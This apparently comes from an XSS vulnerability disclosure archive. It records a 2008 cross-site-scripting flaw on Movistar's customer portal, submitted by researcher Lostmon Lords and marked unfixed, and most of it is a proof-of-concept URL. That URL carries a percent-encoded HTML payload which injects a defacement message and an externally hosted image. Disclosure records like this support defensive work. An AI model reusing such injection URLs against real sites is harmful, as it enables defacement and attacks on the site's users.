Security researcher Lostmon Lords, has submitted on 12/05/2008 a cross-site-scripting (XSS) vulnerability affecting www.canalcliente.movistar.es, which at the time of submission ranked 5582 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 12/05/2008 |
Date published: 07/06/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: Lostmon Lords |
Domain: www.canalcliente.movistar.es |
Category: XSS |
Pagerank: 5582 |
URL: https://www.canalcliente.movistar.es/fwk/cda/controller/CCLI_CW_publico/0,2214,259_1854_200108516_0_ 0,00.html?codError=SGAP036&mensaje=%3C%68%31%3E%53%65%20%62%75%73%63%61%20%48%34%78%30%72%3C%73%74%7 2%6F%6E%67%3E%2C%20%63%6F%6D%6F%20%4C%6F%73%74%6D%6F%6E%20%70%6F%72%20%65%6A%65%6D%70%6C%6F%3A%3C%70 %3E%0D%0A%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%4C%6F%73%74%6D%6F%6E%2E%62%6C%6F% 67%73%70%6F%74%2E%63%6F%6D%22%3E%68%74%74%70%3A%2F%2F%4C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%7 4%2E%63%6F%6D%3C%2F%61%3E%3C%2F%70%3E%3C%2F%68%31%3E%0D%0A%20%45%73%20%70%65%6C%69%67%72%6F%73%6F%20 %79%20%76%61%20%61%72%6D%61%64%6F%3C%62%72%3E%20%4C%6C%65%76%61%20%75%6E%20%70%6F%72%74%61%74%69%6C% 20%79%20%75%6E%20%70%61%6C%6D%20%65%6E%20%6C%61%73%20%6D%61%6E%6F%73%3C%62%72%3E%20%73%69%20%6C%65%2 0%76%65%6E%20%3B%20%6E%6F%20%6C%65%20%70%72%6F%70%6F%72%63%69%6F%6E%65%6E%20%63%6F%6E%65%78%69%6F%6E %20%61%20%69%6E%74%65%72%6E%65%74%2E%3C%2F%70%3E%3C%2F%73%74%72%6F%6E%67%3E%3C%70%3E%3C%2F%70%3E%3C% 69%6D%67%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%74%74%76%6E%2E%63%6F%6D%2E%76%6E%2F%55%70%6 C%6F%61%64%65%64%2F%61%64%6D%69%6E%69%73%74%72%61%74%6F%72%2F%68%61%63%6B%65%72%2E%6A%70%67%3E%3C%68 %31%3E%42%79%20%4C%6F%73%74%6D%6F%6E%3C%2F%68%31%3E |
Click here to view the mirror
|
|
|